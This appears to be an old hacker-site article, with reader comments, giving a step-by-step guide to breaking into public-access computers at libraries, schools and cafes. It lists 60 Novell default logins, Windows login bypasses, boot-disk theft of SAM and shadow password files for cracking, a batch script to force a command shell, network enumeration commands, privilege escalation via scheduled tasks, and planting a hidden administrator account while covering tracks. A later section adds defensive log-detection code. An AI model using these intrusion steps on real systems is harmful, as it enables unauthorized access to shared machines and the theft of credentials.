Physical Intrusion

A small guide about physical intrusion and its various aspects

+{_OPENING_}+

After some experimentation, I decided to write a guide to physical access. This will not cover how to get that access; that is an exercise left up to the reader. This guide covers the steps to take after physical access has been achieved: getting into the system, gaining a command prompt, and (maybe) getting an elevated privilege level. [DISCLAIMER] This paper was not posted with malicious intent. It was posted to further knowledge of physical intrusion and how to conduct tests of it on your own networks. If you do choose to use this knowledge to gain unauthorized access to a network, you're on your own. Neither I, the author (n3w7yp3), nor the site this is posted on will be responsible for your actions in any way, shape or form. If you fuck up, you're on your own! [/DISCLAIMER]

+{_PHASE 1_}+

The first phase of physical intrusion (as with any hacking) is a good amount of recon. The more you know about the system(s), the better your chance of getting in. When you find a place that has public access terminals (local library, cyber cafe, your school, etc.), there are several observations that you should make. First, what OS do they run? Do they use that OS's standard login screen or something different (e.g. Novell)? What are the version numbers? Those are the things to note about the software. As for physical things, do the computers have any disc drives? If so, are they CD, floppy, ZIP, DVD, a combination, or some other type? Be sure to check whether it has a floppy drive, as that can be used to easily perform some otherwise difficult steps later. Take a look at the staff who are supposed to keep an eye on the users. This could be a librarian, teacher, cyber cafe staff member, etc. Are they attentive? Do they walk around? Do they glance over users' shoulders? Also, try to become a regular at the target. Don't just come in twice (once to gather recon and the next time to exploit); instead come a few days a week for about a month, so that the staff get used to seeing you there. Take note of any other details that seem interesting. Try to learn as much as you can, but be sure to hide your knowledge; it could give you away. Now that you have gathered some knowledge about the target (and if you have not, stop reading and do that recon!), it is time to assemble the list of what we will bring along. Here is a list of items that I find useful:

1. A small mirror, like the type found in a woman's cosmetic set (for seeing behind you and to the sides)
2. A floppy disc (this can contain several things; the most common is a Linux boot disk)
3. Pen and paper (to write down useful info)

Well, that was a short list, but that is really all that you need. Now let's get to the next phase: Compromise.

+{_PHASE 2_}+

This is the compromise phase. In this phase you will go and gain access to the network. The stages that we will cover are:

1. Gain access to the system
2. Gain access to the network (if not already connected)
3. Gain a command prompt
4. Gain an elevated privilege level

Remember, when you go in there it *will* be tense. Speed is of the essence, but you have to try to look relaxed (if you don't, it will draw attention to you). Try to dress like the other people at this place so that you blend in (no, you can't wear your 2600 t-shirt...). Basic social engineering (SE) skills may come into play, so be ready. Make sure that you have an excuse for why you are doing what you are doing; this will help allay suspicion if you are caught. Be sure to rehearse this excuse so you can say it without tripping over your words.

Now when you first walk in, you will be presented with a choice of computers. Try to pick one away from most people, preferably with a screen that is hard to see if someone is shoulder surfing. From your recon you should know various details about the system, including how you log in to it. Most likely you have a username and password for the system. If not, there are several things you can try. The first is default passwords; most systems have a few of these. Here are some of the default passwords for Novell (courtesy of www.cirt.net):

All entries are Novell products; the Notes field was empty for every entry.

 #  Product                         Version  Method  User ID           Password          Level
 1  Groupwise 5.5 Enhancement Pack  N/A      Multi   servlet           manager           N/A
 2  Groupwise 6.0                   N/A      Multi   servlet           manager           N/A
 3  iManager                        2.0.1            admin             novell            Administrator
 4  NDS iMonitor                             HTTP    sadmin            (none)            Administrator
 5  Netware                         N/A      Multi   ADMIN             (none)            N/A
 6  Netware                         N/A      Multi   ADMIN             ADMIN             N/A
 7  Netware                         N/A      Multi   ARCHIVIST         (none)            N/A
 8  Netware                         N/A      Multi   ARCHIVIST         ARCHIVIST         N/A
 9  Netware                         N/A      Multi   BACKUP            (none)            N/A
10  Netware                         N/A      Multi   BACKUP            BACKUP            N/A
11  Netware                         N/A      Multi   CHEY_ARCHSVR      (none)            N/A
12  Netware                         N/A      Multi   CHEY_ARCHSVR      CHEY_ARCHSVR      N/A
13  Netware                         N/A      Multi   FAX               (none)            N/A
14  Netware                         N/A      Multi   FAX               FAX               N/A
15  Netware                         N/A      Multi   FAXUSER           (none)            N/A
16  Netware                         N/A      Multi   FAXUSER           FAXUSER           N/A
17  Netware                         N/A      Multi   FAXWORKS          (none)            N/A
18  Netware                         N/A      Multi   FAXWORKS          FAXWORKS          N/A
19  Netware                         N/A      Multi   GATEWAY           (none)            N/A
20  Netware                         N/A      Multi   GATEWAY           GATEWAY           N/A
21  Netware                         N/A      Multi   GUEST             (none)            N/A
22  Netware                         N/A      Multi   GUEST             GUEST             N/A
23  Netware                         N/A      Multi   GUEST             GUESTGUE          N/A
24  Netware                         N/A      Multi   GUEST             GUESTGUEST        N/A
25  Netware                         N/A      Multi   GUEST             TSEUG             N/A
26  Netware                         N/A      Multi   HPLASER           (none)            N/A
27  Netware                         N/A      Multi   HPLASER           HPLASER           N/A
28  Netware                         N/A      Multi   LASER             (none)            N/A
29  Netware                         N/A      Multi   LASER             LASER             N/A
30  Netware                         N/A      Multi   LASERWRITER       (none)            N/A
31  Netware                         N/A      Multi   LASERWRITER       LASERWRITER       N/A
32  Netware                         N/A      Multi   MAIL              (none)            N/A
33  Netware                         N/A      Multi   MAIL              MAIL              N/A
34  Netware                         N/A      Multi   POST              (none)            N/A
35  Netware                         N/A      Multi   POST              POST              N/A
36  Netware                         N/A      Multi   PRINT             (none)            N/A
37  Netware                         N/A      Multi   PRINT             PRINT             N/A
38  Netware                         N/A      Multi   PRINTER           (none)            N/A
39  Netware                         N/A      Multi   PRINTER           PRINTER           N/A
40  Netware                         N/A      Multi   ROOT              (none)            N/A
41  Netware                         N/A      Multi   ROOT              ROOT              N/A
42  Netware                         N/A      Multi   ROUTER            (none)            N/A
43  Netware                         N/A      Multi   SABRE             (none)            N/A
44  Netware                         N/A      Multi   SUPERVISOR        (none)            N/A
45  Netware                         N/A      Multi   SUPERVISOR        HARRIS            N/A
46  Netware                         N/A      Multi   SUPERVISOR        NETFRAME          N/A
47  Netware                         N/A      Multi   SUPERVISOR        NF                N/A
48  Netware                         N/A      Multi   SUPERVISOR        NFI               N/A
49  Netware                         N/A      Multi   SUPERVISOR        SUPERVISOR        N/A
50  Netware                         N/A      Multi   SUPERVISOR        SYSTEM            N/A
51  Netware                         N/A      Multi   TEST              (none)            N/A
52  Netware                         N/A      Multi   TEST              TEST              N/A
53  Netware                         N/A      Multi   USER_TEMPLATE     (none)            N/A
54  Netware                         N/A      Multi   USER_TEMPLATE     USER_TEMPLATE     N/A
55  Netware                         N/A      Multi   WANGTEK           (none)            N/A
56  Netware                         N/A      Multi   WANGTEK           WANGTEK           N/A
57  Netware                         N/A      Multi   WINDOWS_PASSTHRU  (none)            N/A
58  Netware                         N/A      Multi   WINDOWS_PASSTHRU  WINDOWS_PASSTHRU  N/A
59  Netware                         N/A      Multi   WINSABRE          SABRE             N/A
60  Netware                         N/A      Multi   WINSABRE          WINSABRE          N/A

Now, the system might not have Novell installed, or none of those might work. If it is Windows 9x, simply power off the system (a hard power-off will be just fine), unplug the ethernet cable from the back and reboot. Then at the login screen click `Cancel'. Sometimes that will let you on. At this point create a new account and power off the system. Replace the ethernet cable and boot it back up, then log in with the username/password that you just entered (you might have to select the `Local workstation only' option). If the system is Windows XP, try selecting the `Local workstation only' option and entering the username `Administrator' with no password. I have found that this works at my school. If none of these work (or none are viable), power off the machine. Now reboot it and try to get the boot menu (press the F8 key during the boot process). If it comes up, select option 7 for the command line. Then enter the following commands (for Windows 9x):

C:\>cd windows
C:\WINDOWS>ren *.pwl *.txt

Then exit the command line and reboot. Now when the login screen comes up you can enter anything as the username and password (you might have to check the `Local workstation only' box). If that fails, try to boot into safe mode (press and hold F5 during startup). If this succeeds, it may give you Admin privileges. If it does, then the admin who oversees this network has "as much intelligence as 2 tin cans and a rubber band". At this point add a username, reboot and log in (again, don't forget the `Local workstation only' box). Alright, if all that has failed, insert your startup disk. You should have a Linux boot disk as well as one that matches the OS that we are trying to gain access to. Insert the one that matches the OS we're hacking and reboot. Now at the command prompt try the following:

C:\>cd windows
C:\WINDOWS>win

Hopefully that will boot us into Windows. However, chances are that it will not work. If that is the case, power off the box and insert the Linux boot disk. At this point our goal is to copy the password file to the disk and crack it at home. Here are some common locations of password files:

Windows

*SAM file:
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\sam.txt
HKEY_LOCAL_MACHINE\SAM
C:\WINDOWS\system32repair\sam

UNIX (and its variants: Linux, FreeBSD, etc.)

*password file(s):
/etc/passwd
/etc/shadow
/.secure/etc/passwd
/etc/smbpasswd
/etc/nis/passwd
/etc/master.passwd
/etc/security/passwd
/etc/shadow-
/etc/shadow.lock (binary file)

VNC

*Windows:
HKEY_USERS\.DEFAULT\SOFTWARE\ORL\WinVNC3\Password

*UNIX:
$HOME/.vnc/passwd

If you can't find the password file, go on Google and search for the OS and its password file location. If you do get the password file, go home and crack it, then come back and log in.

Okay, by this time we should have local access (one way or another). Also, set up the cosmetic mirror so that you can see behind you, and keep an eye on it; it is your early warning system in case someone comes up behind you. Now, your next goal is to get command prompt access. First let's try the easiest things:

In Windows:

1. Click Start, Run and type cmd (works for all but Win 9x)
2. Click Start, Programs, Accessories and then cmd (again, all but Win 9x)
3. Click Start, Programs and then MS-DOS Prompt (works for Win 9x)

In *nix:

1. Right-click on the desktop and select New Terminal
2. Click on the main menu, System Tools and then Terminal

Now if any of those work, then congrats, you have a shell. If not (which is more likely), we have a few more things to try.

In Windows:

1. Open IE and type C:\ in the address bar. If it lets you in, navigate to the location of the command line and click on the icon. You're in.
2. Open Notepad and type in the following code (save it as 8.cmd if you're on Win2K/XP; save it as *.bat otherwise):

@ECHO OFF
CLS
REM Try every usual location of the command interpreter; each one that exists opens a window
START C:\COMMAND.COM
START C:\WINDOWS\COMMAND.COM
START C:\SYSTEM\COMMAND.COM
START C:\WINDOWS\SYSTEM\COMMAND.COM
START C:\WINNT\CMD.EXE
START C:\WINNT\COMMAND.COM
START C:\WINNT\SYSTEM32\CMD.EXE
START C:\WINNT\SYSTEM32\COMMAND.COM
START C:\WINDOWS\SYSTEM32\CMD.EXE
START C:\WINDOWS\SYSTEM32\COMMAND.COM
START C:\WINDOWS\CMD.EXE
START C:\CMD.EXE
REM Last resort: whichever interpreter is on the PATH
CALL COMMAND.COM
CALL CMD.EXE

2a. Now run it. I have never failed to get command line access using this script.
3. If that fails, try the following: open Notepad, type in the following HTML and save it as a *.html:

<HTML>
<HEAD>
<TITLE>HD Access</TITLE>
</HEAD>
<BODY>
<P><A HREF="file:///C:">Click here for C: drive access</A></P>
</BODY>
</HTML>

3a. Now open that *.html and click the link. Everywhere that I have tried this, it has given me access.
4. Bring command.com on a floppy disk and execute it.

Anyhow, you should have a command line one way or another. Now it is time to gather some info about the network. Here are some commands that can help us do this:

net view
net view /domain
net view /domain:domainame
ipconfig
ipconfig /all
ipconfig /displaydns
route print
arp -a
nbtstat -a [computer]
nbtstat -A [computer]
net use
netstat -an
nslookup (set the query type to any [all] and query the network's name server)
hostname
tracert [host]

Alright, from that little list we have gathered a good deal of info about the host/network. We know their hostname naming scheme (from the `hostname' command), and now we can guess other hostnames and use `nbtstat' to query them for info. We know domain names from `net view /domain' and the computers in those domains from `net view /domain:domainname'. We learned what hosts on the intranet we are connected to from the `netstat -an' command. `tracert', if pointed towards an outside host (e.g. www.google.com), will give us an idea of their network structure, and maybe give us the IP of the gateway and/or router along with other hosts. Well, now that we have some info, let's move on to the next phase: escalate.

+{_PHASE 3_}+

Now it is time for us to get an elevated privilege level. First let's try the `at' command; if it works then "YAY!!!". Make it spawn a shell in a minute (btw: it will run at the highest level, SYSTEM, which is even higher than admin). If not (which is more likely), try copying the password files to a disk (see the above section on boot disks), cracking them and then logging back in as an admin-level account. If all else fails, try to download and execute a local exploit on the system (yes, I know it's lame). Okay, hopefully we got an elevated privilege level by some means....

+{_PHASE 4_}+

Now it is time for the final phase: hiding our tracks. The first thing to do is to delete all the files that we made earlier. Then add an extra admin/SYSTEM/root/superuser account and give it a good strong password. Then log off and walk away, knowing that you have access. BTW, don't forget the things you brought along!
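Everything phases 2 to 4 describe leaves a trail in the Windows Security log: a command interpreter started under a locked-down public-terminal account, a scheduled task (which is what `at' creates) whose action is a shell, and a freshly created account added to the local Administrators group shortly before the logoff. The detection logic below is an added example, not from the original article. It runs over constructed log lines in a key=value flattening of Security events that exists only for this example (the real log is EVTX/XML); the field names follow the real events, the event IDs are the Vista-and-later ones (XP logged the same things as 592, 602, 624 and 636), and the assumption that public-terminal accounts are named kiosk<N> is made up for the sample.

```python
"""Detection rules for the post-access activity described in phases 2 to 4,
run over constructed Windows Security log lines. Added example, not from the article."""
import re
from datetime import datetime

# Constructed sample: one Security event per line, flattened to key=value pairs.
# Field names follow the real events (SubjectUserName, NewProcessName, TargetUserName,
# MemberName); the text format itself is invented for this example.
SAMPLE_LOG = r'''
2007-06-11T08:50:00 EventID=4688 SubjectUserName=kiosk1 NewProcessName="C:\Windows\System32\cmd.exe" ParentProcessName="C:\Windows\explorer.exe"
2007-06-11T08:50:20 EventID=4688 SubjectUserName=alice NewProcessName="C:\Windows\System32\notepad.exe" ParentProcessName="C:\Windows\explorer.exe"
2007-06-11T08:51:00 EventID=4698 SubjectUserName=kiosk1 TaskName="\At1" TaskContent="<Exec><Command>C:\Windows\System32\cmd.exe</Command></Exec>"
2007-06-11T08:53:00 EventID=4720 SubjectUserName=kiosk1 TargetUserName=svc_backup2
2007-06-11T08:53:30 EventID=4732 SubjectUserName=kiosk1 MemberName=svc_backup2 TargetUserName=Administrators
2007-06-11T08:54:00 EventID=4634 SubjectUserName=kiosk1 LogonType=2
2007-06-11T09:10:00 EventID=4720 SubjectUserName=helpdesk TargetUserName=newstaff
2007-06-11T09:12:00 EventID=4732 SubjectUserName=helpdesk MemberName=newstaff TargetUserName=Users
'''

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
SHELLS = ("cmd.exe", "command.com")


def parse_event(line: str) -> dict:
    """Split '<ISO timestamp> key=value ...' into a dict; quoted values may contain spaces."""
    timestamp, rest = line.split(" ", 1)
    event = {key: value.strip('"') for key, value in FIELD_RE.findall(rest)}
    event["ts"] = datetime.fromisoformat(timestamp)
    return event


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_restricted(user: str) -> bool:
    """Assumption for the sample: public-terminal accounts are named kiosk<N>."""
    return user.lower().startswith("kiosk")


def detect(log_text: str, window_seconds: int = 900) -> list:
    """Return (rule, actor, detail) tuples for the three patterns described in the text."""
    alerts = []
    recent_creations = {}  # new account name -> timestamp of its 4720 event
    for line in log_text.strip().splitlines():
        e = parse_event(line)
        eid, actor = e["EventID"], e.get("SubjectUserName", "?")
        if eid == "4688":
            # Phase 2: any command interpreter started under a public-terminal account
            proc = basename(e.get("NewProcessName", ""))
            if proc in SHELLS and is_restricted(actor):
                alerts.append(("shell-on-restricted-account", actor, proc))
        elif eid == "4698":
            # Phase 3: a scheduled task whose action is a shell
            if any(s in e.get("TaskContent", "").lower() for s in SHELLS):
                alerts.append(("scheduled-task-spawns-shell", actor, e.get("TaskName", "")))
        elif eid == "4720":
            recent_creations[e["TargetUserName"]] = e["ts"]
        elif eid == "4732" and e.get("TargetUserName", "").lower() == "administrators":
            # Phase 4: an account created moments ago is made a local administrator
            member = e.get("MemberName", "")
            created_at = recent_creations.get(member)
            if created_at is not None and (e["ts"] - created_at).total_seconds() <= window_seconds:
                alerts.append(("new-local-admin-account", actor, member))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The helpdesk rows in the sample show why the account rule is a two-event correlation rather than a single-event match: creating an account is routine, and only the creation-then-Administrators pairing inside a short window is worth an alert.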

+{_CLOSING_}+

Well, I hope that somebody out there learns something from this. Remember, don't be a black-hat/cracker and use the knowledge that you acquire for damaging systems. Always follow the Hacker Ethic. Well, that's all from me.

peace,
--n3w7yp3

-=EOF=-

Comments

SANTA on June 11 2007 - 08:50:00
ROFL NOOB, Jesus Christ, this is a joke. I couldn't gain access with this guide even if I tried. And you said white-hats feed the skiddies; now every Starbucks is gonna be swamped with skiddies trying this, thanks. Now my methods of intrusion are going to have to be advanced. Oh well, I should have upgraded them a long time ago, but I have a VB app that gets you the admin PW without a Linux disc; it just shuts down the process that is using the SAM file, then copies the file to disc. So go dig a hole and die in it, loser!
TotcoS on June 18 2007 - 13:29:00
wow..santa is crazy..lmfao